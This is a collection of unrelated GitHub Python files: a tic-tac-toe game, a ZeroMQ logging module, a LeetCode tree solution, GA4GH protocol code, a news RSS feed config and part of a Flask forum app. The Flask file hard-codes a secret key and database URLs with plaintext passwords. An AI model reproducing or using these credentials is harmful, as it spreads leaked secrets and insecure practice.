    prints the board, and checks every winning line after each move.
    Returns (won, last_mark): won is True as soon as any row, column,
    or diagonal is filled with the move's mark, False after nine moves
    without a win.
    """
    board = board_pattern()
    move_count = 0
    clear_output()
    # All eight winning lines as (row, col) coordinate triples.
    win_lines = [
        [(0, 0), (0, 1), (0, 2)],
        [(1, 0), (1, 1), (1, 2)],
        [(2, 0), (2, 1), (2, 2)],
        [(0, 0), (1, 0), (2, 0)],
        [(0, 1), (1, 1), (2, 1)],
        [(0, 2), (1, 2), (2, 2)],
        [(0, 0), (1, 1), (2, 2)],
        [(0, 2), (1, 1), (2, 0)],
    ]
    while move_count < 9:
        raw = input("Select position and mark. (format: posi,mark) ")
        pos_text, mark = raw.split(',')
        position = int(pos_text)
        if position <= 3:      # first row
            board[0][position - 1] = mark
        elif position <= 6:    # second row
            board[1][position - 4] = mark
        elif position <= 9:    # third row
            board[2][position - 7] = mark
        for row in board:
            print(row)
        # Win as soon as any line is entirely this move's mark.
        for line in win_lines:
            if all(board[r][c] == mark for r, c in line):
                return True, mark
        move_count += 1
    return False, mark
def interact():
    """Top-level game flow: collect names, show the empty board, optionally
    play one game, then announce the winner or a tie."""
    user1,user2 = basic_info() # collect both confirmed player names
    # Fixed mark assignment: first player is X, second is O.
    hashmap = {user1:'X',user2:'O'}
    for board in board_pattern():# print the initial (empty) board row by row
        print(board)
    continues_game = input('Do you want to continue the game? Y or N ').upper()
    if continues_game == 'Y':
        print(f"First user will always go first, and {user1} uses X and {user2} uses O")
        status,mark = playing()
        if status == True:
            # Reverse lookup: find the player name whose mark won.
            print(f'{list(hashmap.keys())[list(hashmap.values()).index(mark)]} is the winner')
        else:
            print('Game is tied. No winner.')
    elif continues_game == 'N':
        print('Closing Game.')
interact() | aajmlao/Notes-for-learning-Python | project1.py | project1.py | py | 2,942 | python | en | code | 0 | github-code | 36 |
5784044260 | import atexit
import logging.config
import logging.handlers
import os
import tempfile
import zmq
import slivka
# Process-wide ZeroMQ context shared by the handlers/listeners in this
# module; destroyed with linger=0 when the interpreter exits.
_context = zmq.Context()
atexit.register(_context.destroy, 0)
class ZMQQueueHandler(logging.handlers.QueueHandler):
    """QueueHandler that pushes log records as JSON over a ZeroMQ PUSH socket."""
    def __init__(self, address, ctx: zmq.Context = None):
        # Fall back to the module-wide shared context when none is given.
        ctx = ctx or _context
        socket = ctx.socket(zmq.PUSH)
        socket.connect(address)
        # The connected socket plays the role of the handler's "queue".
        super().__init__(socket)
    def emit(self, record):
        # Serialise the record to a JSON-safe dict: bake the formatted
        # message into both `message` and `msg`, and drop fields that are
        # not JSON-encodable (args, exc_info, exc_text).
        message = self.format(record)
        msg = record.__dict__.copy()
        msg.update(
            message=message,
            msg=message,
            args=None,
            exc_info=None,
            exc_text=None
        )
        self.queue.send_json(msg)
class ZMQQueueListener(logging.handlers.QueueListener):
    """QueueListener counterpart of ZMQQueueHandler.

    Binds a PULL socket at *address* and dispatches the JSON-encoded
    records it receives to the attached handlers.
    """
    def __init__(self, address, handlers=(), ctx: zmq.Context = None):
        self._address = address
        ctx = ctx or _context
        self._ctx = ctx
        socket = ctx.socket(zmq.PULL)
        socket.bind(address)
        # Forward every record to every handler regardless of handler level.
        super().__init__(socket, *handlers, respect_handler_level=False)
        # Re-bind as a list so handlers can be added/removed at runtime.
        self.handlers = list(self.handlers)
    def __enter__(self):
        # NOTE(review): returns None, so `with listener as x` binds x=None.
        self.start()
    def __exit__(self, exc_type, exc_val, exc_tb):
        self.stop()
        self.cleanup()
    def add_handler(self, handler):
        # Attach *handler* to receive subsequent records.
        self.handlers.append(handler)
    def remove_handler(self, handler):
        self.handlers.remove(handler)
    def dequeue(self, block):
        # Blocking receive of the next JSON message; *block* is ignored
        # because the PULL socket always blocks.
        msg = self.queue.recv_json()
        if msg == self._sentinel:
            # The sentinel (None) stops the listener thread: close the
            # socket and return the sentinel so the base class exits.
            self.queue.close(0)
            return msg
        else:
            return logging.makeLogRecord(msg)
    def enqueue_sentinel(self):
        # Send the stop sentinel through a throw-away PUSH socket.
        socket = self._ctx.socket(zmq.PUSH)
        socket.connect(self._address)
        socket.send_json(self._sentinel)
    def stop(self):
        super().stop()
        self.queue.close(0)
    def cleanup(self):
        # Remove the filesystem socket left behind by ipc:// transports.
        if self._address.startswith('ipc://'):
            os.unlink(self._address[6:])
def get_logging_sock():
    """Build the per-deployment IPC logging socket address.

    The address lives in the system temp directory and embeds a short
    hash of the slivka home directory, so distinct deployments on the
    same machine get distinct sockets.
    """
    from hashlib import md5
    from base64 import b64encode
    home = slivka.conf.settings.directory.home
    # Six digest bytes, URL-safe base64-encoded, identify this deployment.
    token = b64encode(md5(home.encode()).digest()[:6], b'-_').decode()
    return 'ipc://{}/slivka-logging-{}.sock'.format(tempfile.gettempdir(), token)
def _get_default_logging_config():
    """Return the default dictConfig mapping for slivka logging.

    The 'slivka' logger sends full-format records to the ZMQ queue handler
    (address from get_logging_sock()) and minimal-format records to the
    console; propagation to the root logger is disabled.
    """
    return {
        'version': 1,
        'disable_existing_loggers': False,
        'formatters': {
            'full': {
                'format': "%(asctime)s %(levelname)-10s %(name)s %(message)s",
                'datefmt': "%d/%m/%y %H:%M:%S"
            },
            'minimal': {
                'format': '%(levelname)s %(message)s'
            }
        },
        'handlers': {
            # Ships records to the ZMQQueueListener over the IPC socket.
            'slivka.logging_queue': {
                'class': 'slivka.conf.logging.ZMQQueueHandler',
                'formatter': 'full',
                'level': 'DEBUG',
                'address': get_logging_sock()
            },
            'console': {
                'class': 'logging.StreamHandler',
                'formatter': 'minimal',
                'level': 'DEBUG'
            }
        },
        'loggers': {
            'slivka': {
                'level': 'DEBUG',
                'propagate': False,
                'handlers': ['slivka.logging_queue', 'console']
            }
        }
    }
def configure_logging(config=None):
    """Apply a dictConfig-style logging configuration.

    Any falsy *config* (None, empty dict) falls back to the package
    default produced by _get_default_logging_config().
    """
    effective = config or _get_default_logging_config()
    logging.config.dictConfig(effective)
| bartongroup/slivka | slivka/conf/logging.py | logging.py | py | 3,460 | python | en | code | 7 | github-code | 36 |
22782452778 | #
# @lc app=leetcode id=110 lang=python3
#
# [110] Balanced Binary Tree
#
# https://leetcode.com/problems/balanced-binary-tree/description/
#
# algorithms
# Easy (44.61%)
# Likes: 3301
# Dislikes: 217
# Total Accepted: 550.2K
# Total Submissions: 1.2M
# Testcase Example: '[3,9,20,null,null,15,7]'
#
# Given a binary tree, determine if it is height-balanced.
#
# For this problem, a height-balanced binary tree is defined as:
#
#
# a binary tree in which the left and right subtrees of every node differ in
# height by no more than 1.
#
#
#
# Example 1:
#
#
# Input: root = [3,9,20,null,null,15,7]
# Output: true
#
#
# Example 2:
#
#
# Input: root = [1,2,2,3,3,null,null,4,4]
# Output: false
#
#
# Example 3:
#
#
# Input: root = []
# Output: true
#
#
#
# Constraints:
#
#
# The number of nodes in the tree is in the range [0, 5000].
# -10^4 <= Node.val <= 10^4
#
#
#
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    # FIX: TreeNode exists only in a comment above, so the unquoted
    # annotation raised NameError when this file was run standalone;
    # use a string forward reference instead.
    def isBalanced(self, root: "TreeNode") -> bool:
        """Return True if the tree rooted at *root* is height-balanced.

        A tree is height-balanced when, at every node, the heights of the
        left and right subtrees differ by at most 1. An empty tree is
        balanced.
        """
        balanced, _ = self._check(root)
        return balanced

    def _check(self, root: "TreeNode"):
        """Return (is_balanced, height) for the subtree rooted at *root*.

        Height of an empty subtree is 0. Short-circuits as soon as any
        subtree is found unbalanced (height 0 is returned in that case,
        since it is no longer meaningful).
        """
        if not root:
            return True, 0
        left_ok, left_height = self._check(root.left)
        if not left_ok:
            return False, 0
        right_ok, right_height = self._check(root.right)
        if not right_ok:
            return False, 0
        # Unbalanced here if the subtree heights differ by more than 1.
        if abs(left_height - right_height) > 1:
            return False, 0
        return True, max(left_height, right_height) + 1
# @lc code=end
| Zhenye-Na/leetcode | python/110.balanced-binary-tree.py | 110.balanced-binary-tree.py | py | 2,045 | python | en | code | 17 | github-code | 36 |
1194624429 | """
Definitions of the GA4GH protocol types.
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import inspect
from sys import modules
import google.protobuf.json_format as json_format
import google.protobuf.message as message
import google.protobuf.struct_pb2 as struct_pb2
import ga4gh.pb as pb
from ga4gh._protocol_version import version # noqa
from ga4gh.common_pb2 import * # noqa
from ga4gh.assay_metadata_pb2 import * # noqa
from ga4gh.metadata_pb2 import * # noqa
from ga4gh.metadata_service_pb2 import * # noqa
from ga4gh.read_service_pb2 import * # noqa
from ga4gh.reads_pb2 import * # noqa
from ga4gh.reference_service_pb2 import * # noqa
from ga4gh.references_pb2 import * # noqa
from ga4gh.variant_service_pb2 import * # noqa
from ga4gh.variants_pb2 import * # noqa
from ga4gh.allele_annotations_pb2 import * # noqa
from ga4gh.allele_annotation_service_pb2 import * # noqa
from ga4gh.sequence_annotations_pb2 import * # noqa
from ga4gh.sequence_annotation_service_pb2 import * # noqa
from ga4gh.bio_metadata_pb2 import * # noqa
from ga4gh.bio_metadata_service_pb2 import * # noqa
from ga4gh.genotype_phenotype_pb2 import * # noqa
from ga4gh.genotype_phenotype_service_pb2 import * # noqa
from ga4gh.rna_quantification_pb2 import * # noqa
from ga4gh.rna_quantification_service_pb2 import * # noqa
# A map of response objects to the name of the attribute used to
# store the values returned.
_valueListNameMap = {
SearchVariantSetsResponse: "variant_sets", # noqa
SearchVariantsResponse: "variants", # noqa
SearchDatasetsResponse: "datasets", # noqa
SearchReferenceSetsResponse: "reference_sets", # noqa
SearchReferencesResponse: "references", # noqa
SearchReadGroupSetsResponse: "read_group_sets", # noqa
SearchReadsResponse: "alignments", # noqa
SearchCallSetsResponse: "call_sets", # noqa
SearchVariantAnnotationSetsResponse: "variant_annotation_sets", # noqa
SearchVariantAnnotationsResponse: "variant_annotations", # noqa
SearchFeatureSetsResponse: "feature_sets", # noqa
SearchFeaturesResponse: "features", # noqa
SearchBioSamplesResponse: "biosamples", # noqa
SearchIndividualsResponse: "individuals", # noqa
SearchPhenotypeAssociationSetsResponse: "phenotype_association_sets", # noqa
SearchPhenotypesResponse: "phenotypes", # noqa
SearchGenotypePhenotypeResponse: "associations", # noqa
SearchRnaQuantificationSetsResponse: "rna_quantification_sets", # noqa
SearchRnaQuantificationsResponse: "rna_quantifications", # noqa
SearchExpressionLevelsResponse: "expression_levels", # noqa
}
def getValueListName(protocolResponseClass):
    """
    Return the name of the attribute that the given search response
    class uses to hold its list of result values.
    Raises KeyError for classes that are not search responses.
    """
    return _valueListNameMap[protocolResponseClass]
def convertDatetime(t):
    """
    Convert the datetime object *t* into its protocol representation:
    the number of milliseconds elapsed since the Unix epoch.
    """
    unix_epoch = datetime.datetime.utcfromtimestamp(0)
    elapsed_seconds = (t - unix_epoch).total_seconds()
    return int(elapsed_seconds * 1000)
def getValueFromValue(value):
    """
    Return whichever field of the protobuf Value *value* is currently set.

    Raises TypeError for non-Value arguments and AttributeError when no
    field of the "kind" oneof has been populated.
    """
    if type(value) != struct_pb2.Value:
        raise TypeError("Expected a Value, but got {}".format(type(value)))
    setField = value.WhichOneof("kind")
    if setField is None:
        raise AttributeError("Nothing set for {}".format(value))
    return getattr(value, setField)
def toJson(protoObject, indent=None):
    """
    Serialise the protobuf *protoObject* to a JSON string, optionally
    pretty-printed with *indent*.
    """
    # The internal protobuf helper is used so that we can control the
    # final formatting through json.dumps ourselves.
    rawObject = json_format._MessageToJsonObject(protoObject, True)
    return json.dumps(rawObject, indent=indent)
def toJsonDict(protoObject):
    """
    Return the raw attributes of *protoObject* as a plain key/value
    dictionary (round-trips through the JSON serialiser).
    """
    return json.loads(toJson(protoObject))
def fromJson(json, protoClass):
    """
    Parse the JSON string *json* into a new instance of *protoClass*.
    """
    instance = protoClass()
    return json_format.Parse(json, instance)
def validate(json, protoClass):
    """
    Return True when *json* represents data that could be used to build
    an instance of *protoClass*, and False otherwise.
    """
    try:
        # Parsing performs full validation as a side effect.
        fromJson(json, protoClass)
    except Exception:
        return False
    return True
class SearchResponseBuilder(object):
    """
    A class to allow sequential building of SearchResponse objects.
    """
    def __init__(self, responseClass, pageSize, maxBufferSize):
        """
        Allocates a new SearchResponseBuilder for the specified
        responseClass, user-requested pageSize and the system mandated
        maxBufferSize (in bytes). The maxBufferSize is an
        approximate limit on the overall length of the serialised
        response.
        """
        self._responseClass = responseClass
        self._pageSize = pageSize
        self._maxBufferSize = maxBufferSize
        # Number of values added so far; compared against pageSize.
        self._numElements = 0
        self._nextPageToken = None
        # The response message populated incrementally by addValue().
        self._protoObject = responseClass()
        # Name of the repeated field that stores the result values.
        self._valueListName = getValueListName(responseClass)
        # Running serialised size in bytes; compared against maxBufferSize.
        self._bufferSize = self._protoObject.ByteSize()
    def getPageSize(self):
        """
        Returns the page size for this SearchResponseBuilder. This is the
        user-requested maximum size for the number of elements in the
        value list.
        """
        return self._pageSize
    def getMaxBufferSize(self):
        """
        Returns the maximum internal buffer size for responses, which
        corresponds to total length (in bytes) of the serialised protobuf
        objects. This will always be less than the size of JSON output.
        """
        return self._maxBufferSize
    def getNextPageToken(self):
        """
        Returns the value of the nextPageToken for this
        SearchResponseBuilder.
        """
        return self._nextPageToken
    def setNextPageToken(self, nextPageToken):
        """
        Sets the nextPageToken to the specified value.
        """
        self._nextPageToken = nextPageToken
    def addValue(self, protocolElement):
        """
        Appends the specified protocolElement to the value list for this
        response.
        """
        self._numElements += 1
        self._bufferSize += protocolElement.ByteSize()
        # Repeated protobuf message fields are extended via add()+CopyFrom().
        attr = getattr(self._protoObject, self._valueListName)
        obj = attr.add()
        obj.CopyFrom(protocolElement)
    def isFull(self):
        """
        Returns True if the response buffer is full, and False otherwise.
        The buffer is full if either (1) the number of items in the value
        list is >= pageSize or (2) the total length of the serialised
        elements in the page is >= maxBufferSize.
        If page_size or max_response_length were not set in the request
        then they're not checked.
        """
        return (
            (self._pageSize > 0 and self._numElements >= self._pageSize) or
            (self._bufferSize >= self._maxBufferSize)
        )
    def getSerializedResponse(self):
        """
        Returns a string version of the SearchResponse that has
        been built by this SearchResponseBuilder.
        """
        # pb.string() normalises the possibly-None page token -- presumably
        # to protobuf's default empty string; see ga4gh.pb to confirm.
        self._protoObject.next_page_token = pb.string(self._nextPageToken)
        s = toJson(self._protoObject)
        return s
def getProtocolClasses(superclass=message.Message):
    """
    Return all protocol classes in this module that are subclasses of
    *superclass*.  Only 'leaf' classes are returned, corresponding
    directly to the classes defined in the protocol.
    """
    # Superclasses defined here must be excluded from the result, since
    # callers only want the concrete protocol classes.
    excluded = set([message.Message])
    currentModule = modules[__name__]
    found = []
    for _, candidate in inspect.getmembers(currentModule):
        isLeaf = (inspect.isclass(candidate) and
                  issubclass(candidate, superclass) and
                  candidate not in excluded)
        if isLeaf:
            found.append(candidate)
    return found
# The protocol's POST search endpoints as (path, request class,
# response class) triples.
# Fixed here: '/variantannotations/search' was previously paired with
# SearchVariantAnnotationSetsResponse (a copy/paste slip); it now maps
# to SearchVariantAnnotationsResponse.  Exact-duplicate entries for
# '/datasets/search' and '/callsets/search' have also been removed.
postMethods = \
    [('/callsets/search',
      SearchCallSetsRequest,  # noqa
      SearchCallSetsResponse),  # noqa
     ('/datasets/search',
      SearchDatasetsRequest,  # noqa
      SearchDatasetsResponse),  # noqa
     ('/readgroupsets/search',
      SearchReadGroupSetsRequest,  # noqa
      SearchReadGroupSetsResponse),  # noqa
     ('/reads/search',
      SearchReadsRequest,  # noqa
      SearchReadsResponse),  # noqa
     ('/references/search',
      SearchReferencesRequest,  # noqa
      SearchReferencesResponse),  # noqa
     ('/referencesets/search',
      SearchReferenceSetsRequest,  # noqa
      SearchReferenceSetsResponse),  # noqa
     ('/variants/search',
      SearchVariantsRequest,  # noqa
      SearchVariantsResponse),  # noqa
     ('/featuresets/search',
      SearchFeatureSetsRequest,  # noqa
      SearchFeatureSetsResponse),  # noqa
     ('/features/search',
      SearchFeaturesRequest,  # noqa
      SearchFeaturesResponse),  # noqa
     ('/variantsets/search',
      SearchVariantSetsRequest,  # noqa
      SearchVariantSetsResponse),  # noqa
     ('/variantannotations/search',
      SearchVariantAnnotationsRequest,  # noqa
      SearchVariantAnnotationsResponse),  # noqa
     ('/variantannotationsets/search',
      SearchVariantAnnotationSetsRequest,  # noqa
      SearchVariantAnnotationSetsResponse),  # noqa
     ('/rnaquantificationsets/search',
      SearchRnaQuantificationSetsRequest,  # noqa
      SearchRnaQuantificationSetsResponse),  # noqa
     ('/rnaquantifications/search',
      SearchRnaQuantificationsRequest,  # noqa
      SearchRnaQuantificationsResponse),  # noqa
     ('/expressionlevels/search',
      SearchExpressionLevelsRequest,  # noqa
      SearchExpressionLevelsResponse)]  # noqa
| ga4ghpoc/server | ga4gh/protocol.py | protocol.py | py | 10,280 | python | en | code | null | github-code | 36 |
# RSS feed URL for every supported (outlet, section) pair.  Outer keys
# are the outlet slugs used throughout the application; inner keys are
# the section names.
diccionario = {"telam": {"ultimas": "http://www.telam.com.ar/rss2/ultimasnoticias.xml",
                         "politica": "http://www.telam.com.ar/rss2/politica.xml",
                         "sociedad": "http://www.telam.com.ar/rss2/sociedad.xml",
                         "economia": "http://www.telam.com.ar/rss2/economia.xml",
                         "mundo": "http://www.telam.com.ar/rss2/internacional.xml"},
               "clarin": {"ultimas": "http://www.clarin.com/rss/lo-ultimo/",
                          "politica": "http://www.clarin.com/rss/politica/",
                          "sociedad": "http://www.clarin.com/rss/sociedad/",
                          "economia": "http://www.clarin.com/rss/ieco/",
                          "mundo": "http://www.clarin.com/rss/mundo/"},
               "la-voz": {"ultimas": "http://www.lavoz.com.ar/rss.xml",
                          "politica": "http://www.lavoz.com.ar/taxonomy/term/4/1/feed",
                          "sociedad": "http://www.lavoz.com.ar/taxonomy/term/6/1/feed",
                          "economia": "http://www.lavoz.com.ar/taxonomy/term/2/1/feed",
                          "mundo": "http://www.lavoz.com.ar/taxonomy/term/5/1/feed"},
               "mendoza-online": {"ultimas": "http://www.mdzol.com/files/rss/todoslostitulos.xml",
                                  "politica": "http://www.mdzol.com/files/rss/politica.xml",
                                  "sociedad": "http://www.mdzol.com/files/rss/sociedad.xml",
                                  "economia": "http://www.mdzol.com/files/rss/economia.xml",
                                  "mundo": "http://www.mdzol.com/files/rss/mundo.xml"},
               "el-litoral": {"ultimas": "http://www.ellitoral.com/rss/um.xml",
                              "politica": "http://www.ellitoral.com/rss/poli.xml",
                              "sociedad": "http://www.ellitoral.com/rss/suce.xml",
                              "economia": "http://www.ellitoral.com/rss/econ.xml",
                              "mundo": "http://www.ellitoral.com/rss/inte.xml"}
               }
# Ordered slug lists used for menus / iteration.
lista_medios = ['clarin', 'el-litoral', 'la-voz', 'mendoza-online', 'telam']
lista_secciones = ['ultimas', 'politica', 'sociedad', 'economia', 'mundo']
# Menu choice ("1".."5") <-> slug mappings, kept in both directions for
# O(1) lookups when reading user input and when displaying names.
claves_medios = {"clarin": "1", "el-litoral": "2", "la-voz": "3", "mendoza-online": "4", "telam": "5"}
claves_secciones = {"ultimas": "1", "politica": "2", "sociedad": "3", "economia": "4", "mundo": "5"}
claves_medios_invertido = {"1": "clarin", "2": "el-litoral", "3": "la-voz", "4": "mendoza-online", "5": "telam"}
claves_secciones_invertido = {"1": "ultimas", "2": "politica", "3": "sociedad", "4": "economia", "5": "mundo"}
# English month abbreviation -> month number (for parsing RSS dates).
meses = {"Jan": 1, "Feb": 2, "Mar": 3, "Apr": 4, "May": 5, "Jun": 6, "Jul": 7, "Aug": 8, "Sep": 9, "Oct": 10, "Nov": 11,
         "Dec": 12}
| alvarezfmb/edd-untref | TP/TP-2-Alvarez-Buljubasic-Rombola/tp2/config.py | config.py | py | 2,833 | python | en | code | 0 | github-code | 36 |
12338761878 | ################011011100110010101101111####
### neo Command Line #######################
############################################
def getcmdlist():
    """Return the mapping of neoCL command codes to their descriptions."""
    commands = {}
    commands["f"] = "Find And Replace : Find and replace in family parameters."
    commands["froxl"] = "Family Replacer : Open Excel file."
    commands["frp"] = "Family Replacer : in Project : Replace family and types of instances edited in Excel."
    commands["frv"] = "Family Replacer : in ActiveView : Replace family and types of instances edited in Excel."
    return commands
def runcmd(cmd, msg, recallCL=False):
    """
    Execute the neoCL command identified by *cmd*.

    Unknown commands fall through to the neocl unknown-command handler.
    *msg* is accepted for interface compatibility but not used here.
    Imports are done lazily so a command only loads its own module.
    """
    if cmd == 'f':
        from lib.find import neo_findreplace_main as find
        find.Main()
        return
    if cmd == 'froxl':
        from lib.xl import neo_xl_type_replacer as tyrep
        tyrep.GetWb()
        return
    if cmd == 'frp':
        from lib.xl import neo_xl_type_replacer as tyrep
        tyrep.ImportXl("Project")
        return
    if cmd == 'frv':
        from lib.xl import neo_xl_type_replacer as tyrep
        tyrep.ImportXl("ActiveView")
        return
    from neocl import unknowncmd
    unknowncmd(cmd, recallCL, getcmdlist())
unknowncmd(cmd, recallCL, getcmdlist()) | 0neo/pyRevit.neoCL | neoCL.extension/neocl_f.py | neocl_f.py | py | 1,152 | python | en | code | 7 | github-code | 36 |
35941618047 | from flask import Flask, render_template, url_for, flash, redirect, request, session, make_response
from flask_wtf.file import FileField, FileAllowed
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
from flask_bcrypt import Bcrypt
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, BooleanField, TextAreaField
from wtforms.validators import DataRequired, Length, ValidationError, EqualTo, Email
from flask_login import LoginManager, UserMixin, login_user, current_user, logout_user, login_required
from PIL import Image
import re
import secrets
import os
from flask import Flask, redirect, url_for
import time
import requests
import json
import pandas as pd
import folium
import urllib.parse
from requests_oauthlib import OAuth1
import tweepy
app = Flask(__name__)
# SECURITY(review): the secret key and the database credentials below
# are hard-coded in source control; they should be moved to environment
# variables or a config file outside the repository, and rotated.
app.config['SECRET_KEY'] = 'ea7b11f0714027a81e7f81404612d80d'
# Previous database URLs, kept for reference:
# DB_URL = 'postgresql+psycopg2://jasonjia:227006636@csce-315-db.engr.tamu.edu/SILT_DB'.format(user=POSTGRES_USER,pw=POSTGRES_PW,url=POSTGRES_URL,db=POSTGRES_DB)
# DB_URL1 = 'postgresql://jasonjia:227006636@csce-315-db.engr.tamu.edu:5432/SILT_DB_test'
DB_URL1 = 'postgresql://doadmin:jglyvd028l8ced6h@db-silt-db-do-user-8284135-0.b.db.ondigitalocean.com:25060/defaultdb'
app.config['SQLALCHEMY_DATABASE_URI']=DB_URL1
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False # silence the deprecation warning
db = SQLAlchemy(app)
bcrypt = Bcrypt(app)
login_manager = LoginManager(app)
# Unauthenticated visits to @login_required views redirect to /login.
login_manager.login_view = 'login'
# Bootstrap alert category used for the login-required flash message.
login_manager.login_message_category = 'info'
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login callback: resolve the session's (string) user id to a User row."""
    numeric_id = int(user_id)
    return User.query.get(numeric_id)
class User(db.Model, UserMixin):
    """Account table; UserMixin provides the Flask-Login session hooks."""
    id = db.Column(db.Integer, primary_key = True)
    email = db.Column(db.String(180), unique = True, nullable = False)
    # Set once the user links a Twitter account; None until then.
    twitter_username = db.Column(db.String(50), unique=True, default = None)
    username = db.Column(db.String(30), unique = True, nullable = False)
    # Stores the bcrypt hash produced by register(), not the plain password.
    password = db.Column(db.String(), nullable = False)
    user_pic = db.Column(db.String(20), nullable = False, default='default.jpg')
    # One relationship per forum board plus the stored Spotify artists;
    # each gives the child rows an `author` backref to this user.
    posts = db.relationship('Post', backref='author', lazy = True)
    posts_ac = db.relationship('Post_ac', backref='author', lazy = True)
    post_h = db.relationship('Post_h', backref='author', lazy = True)
    post_sp = db.relationship('Post_sp', backref='author', lazy = True)
    post_cr = db.relationship('Post_cr', backref='author', lazy = True)
    post_ev = db.relationship('Post_ev', backref='author', lazy = True)
    spotifyartist = db.relationship('SpotifyArtist', backref='author', lazy = True)
    def __init__(self, email, username, password):
        # Explicit constructor: callers must hash the password themselves.
        self.email = email
        self.username = username
        self.password = password
    def __repr__ (self):
        return f"User('{self.username}', '{self.email}', '{self.user_pic}', '{self.id}')"
class Post(db.Model):
    """A post on the general (home) forum board."""
    id = db.Column(db.Integer, primary_key = True)
    title = db.Column(db.String(50), nullable = False)
    post_time = db.Column(db.DateTime, nullable = False, default=datetime.utcnow)
    content = db.Column(db.String, nullable = False)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    def __repr__(self):
        # Bug fix: was `self.tile` (AttributeError); the column is `title`.
        return f"Post('{self.title}', '{self.post_time}', '{self.content}')"
class Post_ac(db.Model):
    """A post on the academics (study lounge) board."""
    id = db.Column(db.Integer, primary_key = True)
    title = db.Column(db.String(50), nullable = False)
    post_time = db.Column(db.DateTime, nullable = False, default=datetime.utcnow)
    content = db.Column(db.String, nullable = False)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    def __repr__(self):
        # Bug fix: was `self.tile` (AttributeError); the column is `title`.
        return f"Post('{self.title}', '{self.post_time}', '{self.content}')"
class Post_h(db.Model):
    """A post on the humour (funny) board."""
    id = db.Column(db.Integer, primary_key = True)
    title = db.Column(db.String(50), nullable = False)
    post_time = db.Column(db.DateTime, nullable = False, default=datetime.utcnow)
    content = db.Column(db.String, nullable = False)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    def __repr__(self):
        # Bug fix: was `self.tile` (AttributeError); the column is `title`.
        return f"Post('{self.title}', '{self.post_time}', '{self.content}')"
class Post_sp(db.Model):
    """A post on the sports board."""
    id = db.Column(db.Integer, primary_key = True)
    title = db.Column(db.String(50), nullable = False)
    post_time = db.Column(db.DateTime, nullable = False, default=datetime.utcnow)
    content = db.Column(db.String, nullable = False)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    def __repr__(self):
        # Bug fix: was `self.tile` (AttributeError); the column is `title`.
        return f"Post('{self.title}', '{self.post_time}', '{self.content}')"
class Post_cr(db.Model):
    """A post on the course board."""
    id = db.Column(db.Integer, primary_key = True)
    title = db.Column(db.String(50), nullable = False)
    post_time = db.Column(db.DateTime, nullable = False, default=datetime.utcnow)
    content = db.Column(db.String, nullable = False)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    def __repr__(self):
        # Bug fix: was `self.tile` (AttributeError); the column is `title`.
        return f"Post('{self.title}', '{self.post_time}', '{self.content}')"
class Post_ev(db.Model):
    """A post on the events board."""
    id = db.Column(db.Integer, primary_key = True)
    title = db.Column(db.String(50), nullable = False)
    post_time = db.Column(db.DateTime, nullable = False, default=datetime.utcnow)
    content = db.Column(db.String, nullable = False)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    def __repr__(self):
        # Bug fix: was `self.tile` (AttributeError); the column is `title`.
        return f"Post('{self.title}', '{self.post_time}', '{self.content}')"
class SpotifyArtist(db.Model):
    """Delimited dump of one user's Spotify top artists.

    The profile() route writes names joined with ",! " into
    `artist_name` and ids joined with ", " into `artist_id`.
    """
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    artist_name = db.Column(db.String(2000), nullable=False)
    artist_id = db.Column(db.String(2000), nullable=False)
    # time_range = db.Column(db.String(15), nullable=False)
    def __repr__(self):
        return f"SpotifyArtist('{self.artist_name}', '{self.artist_id}')"
# do not change this
# from form import account, LoginForm, update_account, PostForm, spotify_profile
####################
## FORMS ##
####################
class account(FlaskForm):
    """Sign-up form.

    WTForms automatically invokes the ``validate_<field>`` methods
    during ``validate_on_submit`` to enforce username/email uniqueness.
    """
    # user name not null and not too long. Add validation
    username = StringField('Username', validators=[DataRequired(), Length(min = 2, max = 30)])
    email = StringField('Email', validators=[DataRequired(), Length(min = 6), Email()])
    password = PasswordField('Password', validators=[DataRequired()])
    confirmed_password = PasswordField('Confirm Password', validators=[DataRequired(), EqualTo('password')])
    submit = SubmitField('Sign Up')
    # NOTE(review): an earlier revision restricted registration to
    # @tamu.edu addresses with a regex validator; that code was disabled
    # and the commented-out versions have been removed for clarity.
    def validate_username(self, username):
        """Reject usernames that already exist in the database."""
        user = User.query.filter_by(username=username.data).first()
        if user:
            raise ValidationError('Username is taken, Please choose a new one')
    def validate_email(self, email):
        """Reject email addresses that already exist in the database."""
        email = User.query.filter_by(email=email.data).first()
        if email:
            raise ValidationError('Email is taken, Please choose a new one')
class LoginForm(FlaskForm):
    """Log-in form.

    NOTE: the remember-me field is spelled `remeber` (sic); the login
    route references it under that name, so renaming it would require a
    coordinated change.
    """
    email = StringField('Email', validators=[DataRequired(), Length(min = 6)])
    password = PasswordField('Password', validators=[DataRequired()])
    remeber = BooleanField('Remember Me')
    submit = SubmitField('Login')
class update_account(FlaskForm):
    """Profile-edit form: change username, email and profile picture.

    Uniqueness checks are skipped when a field is unchanged so users can
    resubmit their own current name/email without errors.
    """
    # user name not null and not too long. Add validation
    username = StringField('Username', validators=[DataRequired(), Length(min = 2, max = 30)])
    email = StringField('Email', validators=[DataRequired(), Length(min = 6), Email()])
    picture = FileField('Update Your Picture', validators=[FileAllowed(['jpg', 'png'])])
    submit = SubmitField('Update')
    def validate_username(self, username):
        """Enforce uniqueness only when the username actually changed."""
        if username.data != current_user.username:
            user = User.query.filter_by(username=username.data).first()
            if user:
                raise ValidationError('Username is taken, Please choose a new one')
    def validate_email(self, email):
        """Enforce uniqueness only when the email actually changed."""
        if email.data != current_user.email:
            email = User.query.filter_by(email=email.data).first()
            if email:
                raise ValidationError('Email is taken, Please choose a new one')
class PostForm(FlaskForm):
